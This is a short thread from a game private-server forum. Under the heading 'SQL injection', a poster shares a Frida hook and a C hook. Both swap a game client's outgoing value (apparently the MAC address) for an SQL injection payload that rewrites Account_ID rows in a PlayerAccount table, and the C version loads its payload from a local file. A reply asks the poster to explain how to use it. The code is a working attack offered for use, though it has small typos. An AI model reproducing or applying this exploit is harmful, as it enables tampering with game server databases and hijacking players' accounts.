regarding SQL injection

the1Domo

the1Domo

Founder of EvilSource
Trophy Point Collector
Joined
Jun 17, 2010
Messages
328
Reaction score
275
Code: 
0x6031C0

Interceptor.attach(ptr("0x6031C0"), {
 onLeave: function(retval){
  var request = "?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--";
  retval.replace(Memory.allocUtf8String(request));
 }
})





RF_O_UP_FUNC_CONTEXT(getMac_hook, 0x6031C0, 0x0); //eax as this
char* read_request(){
 FILE *f = fopen("C:\\request.txt", "r");
 fseek(f, 0, SEEK_END);
 long fsize = ftell(F);
 fseek(f, 0, SEEK_SET);

 char *string = (char*)malloc(fsize + 1);
 fread(string, fsize, 1, f);
 fclose(F);

 string[fsize] = 0;
 return string;
}

void getMac_hook(Context *context){
 int *ptr = (int*)(void*)(context->ESP);
 ptr[5] = (int)(int*)read_request();
}



getMac_hook("update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--");
 
Domo, while i can tell what this does and so can a few others, a lot of others may not be able to. You should let them know what to do with it.
 
You must log in or register to reply here.

RaGEZONE Sponsor

    HyperFilter

About RaGEZONE

RaGEZONE® is the top forum for MMO, MMORPG, and mobile game development. We provide binaries, source codes, and tutorials for your favorite games, making it the go-to resource for developers and fans. You can also find and share private servers, fostering a vibrant gamer community.

Forum Statistics

Members online
861
Guests online
2,441
Total visitors
3,302
Totals may include hidden visitors.

RaGEZONE Partners

    nongamstopbets.com UK sites not on GamStop Casino Deps NZ
Back